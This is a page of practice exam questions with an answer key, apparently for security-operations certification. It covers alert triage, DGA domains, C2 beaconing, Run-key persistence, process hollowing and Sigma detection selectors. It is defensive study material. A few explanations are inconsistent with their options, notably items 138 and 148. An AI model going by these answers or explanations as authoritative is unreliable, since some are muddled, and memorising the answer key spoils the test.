DNS tunneling often uses TXT records to encode data, and the packet sizes can be larger than normal DNS queries.

137
MCQeasy

A vulnerability scan report shows a critical finding with a CVSS score of 9.8. The system is a web server behind a WAF that blocks the attack vector. What should the analyst do?

A.Report the finding as a false positive
B.Re-run the scan with credentials
C.Patch the server immediately
D.Document the WAF as a compensating control and accept the risk
AnswerD

Correct. Compensating controls reduce risk.

Why this answer

A compensating control (WAF) may mitigate the risk. The analyst should document it and adjust the risk rating accordingly.

138
Multi-Selecthard

A security analyst is reviewing an alert from Azure Sentinel that indicates a possible privilege escalation attempt. The alert is based on a correlation rule that detects unusual usage of the 'Add-AzKeyVaultKey' cmdlet by a user who has never used it before. The analyst needs to validate the alert and determine if the activity is malicious. Which THREE actions should the analyst take?

Select 3 answers
A.Check the user's role assignments and permissions
B.Run a vulnerability scan on the user's workstation
C.Review the Key Vault's diagnostic logs for any key retrieval after the cmdlet
D.Disable the user account immediately
E.Verify the user's identity by checking Azure AD sign-in logs
AnswersA, C, E

Understanding the user's privileges helps assess if the action is within scope.

Why this answer

Checking Azure AD logs for the authentication context, reviewing the user's recent activity history, and examining the Key Vault audit logs for any subsequent access are all relevant steps.

139
MCQmedium

A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?

A.T1078 (Valid Accounts)
B.T1053.005 (Scheduled Task)
C.T1047 (WMI)
D.T1059.001 (PowerShell)
AnswerD

PowerShell is the technique for executing commands and downloading files.

Why this answer

T1059.001 is PowerShell, which is commonly used for file downloads. The hunter should create detection rules for PowerShell download cradles.

140
MCQhard

A security analyst is reviewing DNS logs and notices that a workstation is making frequent queries to domains with random-looking strings, such as 'a3b9f2d1.example.com'. These domains resolve to different IP addresses each time. Which type of activity is most likely being observed?

A.Normal DNS caching behavior
B.A misconfigured DNS resolver
C.DNS tunneling
D.Domain generation algorithm (DGA) usage
AnswerD

Random-looking domains that change frequently are characteristic of DGA.

Why this answer

Domain Generation Algorithms (DGAs) produce random-looking domain names that change frequently to evade blocklists. This behavior is typical of malware that uses DGA for command and control.

141
MCQhard

A threat hunter is creating a Sigma rule to detect a specific TTP where an attacker uses reg.exe to create a Run key for persistence. Which of the following Sigma rule event selectors would best detect this activity?

A.EventID: 4688 (Process Creation) AND ParentImage: '*reg.exe*'
B.EventID: 13 (Registry Value Set) AND TargetObject: '*\CurrentVersion\Run*'
C.EventID: 4657 (Registry modification) AND ObjectName: '*\RunOnce*'
D.EventID: 1 (Process Creation) AND CommandLine: '*reg.exe*'
AnswerB

Directly detects registry value writes to the Run key.

Why this answer

Registry persistence via Run keys is commonly achieved by modifying HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Sigma rules targeting registry add/modify events with that path will detect it.

142
MCQmedium

An analyst receives an alert that a user's workstation contacted a known command-and-control (C2) IP address. The analyst checks the EDR logs and finds that the process 'svchost.exe' initiated the connection. What should the analyst do next to determine if this is a true positive?

A.Check the parent process of svchost.exe
B.Verify the IP address with threat intelligence feeds
C.Search for other workstations contacting the same IP
D.Isolate the workstation from the network immediately
AnswerA

Svchost.exe normally runs from Services.exe; abnormal parent indicates potential code injection or LOLBins.

Why this answer

Checking the parent process of svchost.exe helps identify if it was spawned by a malicious process like a service or scheduled task, indicating compromise.

143
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from a known internal IP address to a file server. The user authenticated successfully on the next attempt. Which classification best describes this alert?

A.True negative
B.True positive
C.False negative
D.False positive
AnswerD

Correct. The alert fired on benign activity, so it is a false positive.

Why this answer

The alert is a false positive because a single failed login followed by success is normal user behavior and not indicative of malicious activity.

144
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a known malicious IP address communicating with an internal server. The analyst checks the threat intelligence feed and confirms the IP is associated with a command-and-control server. What type of alert is this?

A.False negative
B.True positive
C.False positive
D.True negative
AnswerB

The alert correctly identified known malicious activity.

Why this answer

A true positive occurs when an alert correctly identifies malicious activity. The IP is confirmed as a C2 server, so the alert is valid.

145
MCQmedium

A SOC analyst is triaging a SIEM alert for a registry modification on a workstation. The alert indicates a new Run key was added under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which of the following is the most likely purpose of this modification?

A.To change the desktop wallpaper
B.To establish persistence
C.To disable Windows Defender
D.To update the system time
AnswerB

Run keys cause the specified program to run at every user logon, providing persistence.

Why this answer

Run keys are a common persistence mechanism used by malware to ensure execution at user logon.

146
MCQeasy

Which of the following is the best data source for detecting DNS tunneling activity?

A.Firewall logs
B.DNS logs
C.EDR telemetry
D.NetFlow data
AnswerB

DNS logs provide the full query and response details needed to detect tunneling.

Why this answer

DNS logs contain the queries and responses; analyzing them for unusual domain patterns, large query volumes, or odd record types can reveal tunneling.

147
MCQmedium

A security analyst is tuning a SIEM correlation rule that generates alerts when a single user logs into more than 10 workstations within 5 minutes. The rule is producing excessive false positives due to service accounts performing automated tasks. Which of the following is the best tuning approach to reduce false positives while still detecting potential lateral movement?

A.Change the time window to 10 minutes
B.Increase the threshold to 20 workstations
C.Add an exception for known service account names
D.Disable the rule and rely on manual log review
AnswerC

Correct. Excluding known service accounts reduces false positives without weakening detection for user accounts.

Why this answer

Excluding known service accounts from the rule reduces false positives while still detecting lateral movement by user accounts.

148
MCQhard

An analyst is reviewing a memory dump of a compromised system and notices that the memory of a legitimate process (e.g., notepad.exe) contains a PE header and executable code that is not part of the original binary. Which technique is most likely being used?

A.A reflective DLL loader
B.Process hollowing
C.DLL injection
D.API hooking
AnswerB

Process hollowing replaces the process's code with malicious code, leaving the PE header visible.

Why this answer

Process hollowing involves replacing the legitimate code of a running process with malicious code, but the PE header and executable code in memory indicate code injection, specifically hollowing.

149
MCQmedium

During a network traffic analysis, a security analyst notices a host communicating with an external IP address over TCP port 443 using a self-signed certificate. The traffic flows are consistent in size and occur every 60 seconds. The external IP is not on any threat intelligence feeds. What does this pattern most likely indicate?

A.Lateral movement attempt
B.Data exfiltration via DNS tunneling
C.Command and control beaconing
D.Normal web browsing
AnswerC

Correct. Periodic, consistent outbound connections are characteristic of C2 beaconing.

Why this answer

Regular, periodic connections of consistent size to an external host over HTTPS suggest beaconing, often used by malware for command and control.

150
MCQmedium

A security analyst is triaging an alert from the EDR that shows the process 'powershell.exe' with a parent process of 'winword.exe'. The user recently opened a document from an email. What is the most likely explanation?

A.The user double-clicked a PowerShell script attached to the email
B.The document contains a malicious macro that spawned PowerShell to execute commands
C.A scheduled task started PowerShell that initiated Word
D.The user is running a legitimate PowerShell script from within a Word document
AnswerB

Attackers often use macros in Office documents to launch PowerShell for code execution.

Why this answer

This is a classic sign of a macro-based attack where a malicious document spawns PowerShell to execute payloads.

← PreviousPage 2 of 3 · 165 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Cysa Security Operations questions.